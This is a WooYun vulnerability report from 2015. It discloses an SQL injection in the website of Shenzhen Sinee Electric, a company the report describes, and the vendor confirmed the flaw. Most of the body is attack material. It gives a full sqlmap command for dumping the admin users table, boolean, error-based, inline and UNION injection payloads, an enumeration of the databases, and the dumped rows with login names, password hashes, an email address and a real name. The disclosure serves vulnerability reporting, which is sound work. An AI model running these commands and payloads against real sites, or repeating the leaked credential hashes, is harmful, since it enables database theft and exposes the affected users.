当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153229

漏洞标题:深圳市正弦电气股份有限公司某站点存在SQL注射漏洞(7万条系统备份信息泄露/13万系统消息泄露/用户密码,邮箱,登陆IP等信息泄露)

相关厂商:深圳市正弦电气股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-10 10:44

修复时间:2015-12-26 15:02

公开时间:2015-12-26 15:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

深圳市正弦电气股份有限公司成立于2003年4月,注册资本6450万元。
公司专注于电气传动自动化产品的研发、生产和销售,服务于中高端设备制造商和系统集成商。
正弦电气是国家高新技术企业和深圳知名品牌企业,公司坚持技术领先和产品创新战略,为客户量身定制专用产品和解决方案,致力于成为行业细分市场的领导者。
公司不断提升企业综合竞争力,注重自主技术革新,长期吸纳和储备高端技术人才,引进国际先进的运营和研发管理流程,实行严格的质量过程管控。
公司拥有规模化的先进检验检测设备、实验设备和生产设备,能够完全满足低、中压工控产品的研发、测试和生产,年产能超12万台。变频器、伺服、一体化控制器等产品屡获殊荣,在中国大陆市场拥有良好的行业口碑,并远销东南亚、中东、俄罗斯等地。
公司产品全部拥有自主知识产权,经过国家权威机构的检验和产品登记,通过CE认证,质量管理体系通过ISO9001认证。
公司在全国各地设立了4个仓储和物流中心、12个区域服务中心、19个营销办事处,常驻营销人员和技术服务工程师,为客户提供专业便捷的服务。

详细说明:

地址:http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43

python sqlmap.py -u "http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43"-p lcid --technique=BEQU --random-agent --batch -D sq_sinee2013hk -T Whir_Sec_Users -C LoginName,Password,UserId,Email,RealName,LastLoginIP --dump


Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 70009 |


Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |

漏洞证明:

Database: sq_sinee2013hk
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Whir_Cmn_Area | 3260 |
| sq_sinee2013HK.Whir_Cmn_Area | 3260 |
| sq_sinee2013HK.Whir_Sec_Resources | 1015 |
| dbo.Whir_Sec_Resources | 1011 |
| sq_sinee2013HK.Whir_Ext_Upload | 859 |
| sq_sinee2013HK.Whir_U_Jobs_JobRequest | 751 |
| dbo.Whir_Ext_Upload | 708 |
| dbo.Whir_Dev_Field | 612 |
| sq_sinee2013HK.Whir_Dev_Field | 612 |
| dbo.Whir_U_Jobs_JobRequest | 511 |
| dbo.Whir_Sec_RolesInResources | 380 |
| dbo.Whir_Sec_RolesInResources | 380 |
| sq_sinee2013HK.Whir_Sec_RolesInResources | 380 |
| sq_sinee2013HK.Whir_Sec_RolesInResources | 380 |
| sq_sinee2013HK.Whir_U_Content_Bak | 374 |
| sq_sinee2013HK.Whir_U_Content_Bak | 374 |
| dbo.Whir_U_Content_Bak | 268 |
| dbo.Whir_U_Content_Bak | 268 |
| sq_sinee2013HK.Whir_U_Product_Bak | 198 |
| sq_sinee2013HK.Whir_U_Product_Bak | 198 |
| sq_sinee2013HK.Whir_U_SinglePage_Bak | 131 |
| sq_sinee2013HK.Whir_U_SinglePage_Bak | 131 |
| dbo.Whir_Dev_FormDate | 128 |
| sq_sinee2013HK.Whir_Dev_FormDate | 128 |
| dbo.Whir_Dev_Menu | 127 |
| sq_sinee2013HK.Whir_Dev_Menu | 127 |
| dbo.Whir_U_SinglePage_Bak | 125 |
| dbo.Whir_U_SinglePage_Bak | 125 |
| sq_sinee2013HK.Whir_U_SalesNet_Bak | 114 |
| sq_sinee2013HK.Whir_U_SalesNet_Bak | 114 |
| dbo.Whir_U_Product_Bak | 112 |
| dbo.Whir_U_Product_Bak | 112 |
| sq_sinee2013HK.Whir_U_Download_Bak | 112 |
| sq_sinee2013HK.Whir_U_Download_Bak | 112 |
| dbo.Whir_U_Download_Bak | 73 |
| dbo.Whir_U_Download_Bak | 73 |
| dbo.Whir_Dev_Column | 72 |
| sq_sinee2013HK.Whir_Dev_Column | 72 |
| dbo.Whir_U_SalesNet_Bak | 58 |
| dbo.Whir_U_SalesNet_Bak | 58 |
| dbo.Whir_U_Product_Category | 44 |
| sq_sinee2013HK.Whir_U_Product_Category | 44 |
| dbo.Whir_Dev_FormOption | 42 |
| dbo.Whir_Dev_FormUpload | 42 |
| sq_sinee2013HK.Whir_Dev_FormOption | 42 |
| sq_sinee2013HK.Whir_Dev_FormUpload | 42 |
| dbo.Whir_Dev_ConfigStrategy | 37 |
| dbo.Whir_Dev_Module | 37 |
| sq_sinee2013HK.Whir_Dev_ConfigStrategy | 37 |
| sq_sinee2013HK.Whir_Dev_Module | 37 |
| sq_sinee2013HK.Whir_U_Content_Category | 36 |
| dbo.Whir_Dev_Model | 32 |
| sq_sinee2013HK.Whir_Dev_Model | 32 |
| dbo.Whir_U_Content_Category | 31 |
| dbo.Whir_U_Download_Category | 18 |
| sq_sinee2013HK.Whir_U_Download_Category | 17 |
| dbo.Whir_U_Jobs_Category | 12 |
| sq_sinee2013HK.Whir_U_Jobs_Category | 12 |
| dbo.Whir_Cnt_WorkFlowLogs | 11 |
| sq_sinee2013HK.Whir_Cnt_WorkFlowLogs | 11 |
| dbo.Whir_U_Jobs_Bak | 10 |
| dbo.Whir_U_Jobs_Bak | 10 |
| sq_sinee2013HK.Whir_U_Jobs_Bak | 10 |
| sq_sinee2013HK.Whir_U_Jobs_Bak | 10 |
| sq_sinee2013HK.Whir_U_Links_Bak | 10 |
| sq_sinee2013HK.Whir_U_Links_Bak | 10 |
| dbo.Whir_U_Links_Bak | 9 |
| dbo.Whir_U_Links_Bak | 9 |
| dbo.Whir_Dev_SubmitForm | 6 |
| sq_sinee2013HK.Whir_Dev_SubmitForm | 6 |
| dbo.Whir_Sec_Users | 4 |
| sq_sinee2013HK.Whir_Sec_Users | 4 |
| dbo.Whir_Cnt_Attached | 2 |
| dbo.Whir_Ext_Gather | 2 |
| dbo.Whir_Sit_SiteInfo | 2 |
| sq_sinee2013HK.Whir_Cnt_Attached | 2 |
| sq_sinee2013HK.Whir_Ext_Gather | 2 |
| sq_sinee2013HK.Whir_Sit_SiteInfo | 2 |
| dbo.Whir_Ext_AuditActivity | 1 |
| dbo.Whir_Ext_WorkFlow | 1 |
| sq_sinee2013HK.Whir_Ext_AuditActivity | 1 |
| sq_sinee2013HK.Whir_Ext_WorkFlow | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 10642 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.trace_event_bindings | 3958 |
| sys.all_columns | 3740 |
| sys.system_columns | 3696 |
| sys.syscomments | 2744 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1747 |
| sys.sysobjects | 1747 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1641 |
| sys.syspermissions | 1641 |
| sys.sysprotects | 1640 |
| sys.all_sql_modules | 1589 |
| sys.system_sql_modules | 1589 |
| sys.database_recovery_status | 286 |
| sys.databases | 286 |
| sys.sysdatabases | 286 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.dm_db_partition_stats | 101 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.fulltext_languages | 17 |
| sys.xml_schema_component_placements | 17 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.database_principals | 14 |
| sys.schemas | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.service_queue_usages | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 70009 |
| dbo.backupset | 35004 |
| dbo.backupmediafamily | 1995 |
| dbo.backupmediaset | 1994 |
| dbo.restorefilegroup | 372 |
| dbo.restorefilegroup | 372 |
| dbo.restorehistory | 372 |
| dbo.suspect_pages | 3 |
+--------------------------------------------------+---------+


Database: msdb
Table: backupfile
[25 columns]
+------------------------+------------------+
| Column | Type |
+------------------------+------------------+
| backed_up_page_count | numeric |
| backup_set_id | int |
| backup_size | numeric |
| create_lsn | numeric |
| differential_base_guid | uniqueidentifier |
| differential_base_lsn | numeric |
| drop_lsn | numeric |
| file_guid | uniqueidentifier |
| file_number | numeric |
| file_size | numeric |
| file_type | char |
| filegroup_guid | uniqueidentifier |
| filegroup_name | nvarchar |
| first_family_number | tinyint |
| first_media_number | smallint |
| is_present | bit |
| is_readonly | bit |
| logical_name | nvarchar |
| page_size | int |
| physical_drive | nvarchar |
| physical_name | nvarchar |
| read_only_lsn | numeric |
| read_write_lsn | numeric |
| source_file_block_size | numeric |
| state_desc | nvarchar |
+------------------------+------------------+


Database: sq_sinee2013hk
Table: Whir_Sec_Users
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CreateDate | datetime |
| CreateUser | nvarchar |
| Email | nvarchar |
| IsDel | bit |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LoginName | nvarchar |
| LoginType | nvarchar |
| Password | nvarchar |
| RealName | nvarchar |
| Remarks | nvarchar |
| RolesId | int |
| Sort | bigint |
| State | int |
| SystemLanguage | int |
| SystemSkin | nvarchar |
| UpdateDate | datetime |
| UpdateUser | nvarchar |
| UserId | int |
+----------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lcid (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: itemid=35&lcid=(SELECT (CASE WHEN (8371=8371) THEN 8371 ELSE 8371*(SELECT 8371 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: itemid=35&lcid=43 AND 8230=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8230=8230) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: itemid=35&lcid=(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1615=1615) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113))
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: itemid=35&lcid=43 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(101)+CHAR(67)+CHAR(115)+CHAR(112)+CHAR(121)+CHAR(118)+CHAR(67)+CHAR(85)+CHAR(113)+CHAR(71)+CHAR(113)+CHAR(69)+CHAR(90)+CHAR(107)+CHAR(84)+CHAR(75)+CHAR(119)+CHAR(80)+CHAR(115)+CHAR(118)+CHAR(88)+CHAR(78)+CHAR(102)+CHAR(90)+CHAR(106)+CHAR(90)+CHAR(97)+CHAR(115)+CHAR(69)+CHAR(76)+CHAR(75)+CHAR(72)+CHAR(65)+CHAR(79)+CHAR(100)+CHAR(97)+CHAR(82)+CHAR(88)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL-- -
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
Database: sq_sinee2013hk
Table: Whir_Sec_Users
[4 entries]
+-----------+------------------------------------------+--------+--------------------+----------+----------------+
| LoginName | Password | UserId | Email | RealName | LastLoginIP |
+-----------+------------------------------------------+--------+--------------------+----------+----------------+
| admin | EED5873ACF981C43FE65257D87351443A50470AC | 6 | <blank> | 超级管理员 | **.**.**.** |
| sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |
| sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |
| sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |
+-----------+------------------------------------------+--------+--------------------+----------+----------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-11 15:00

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无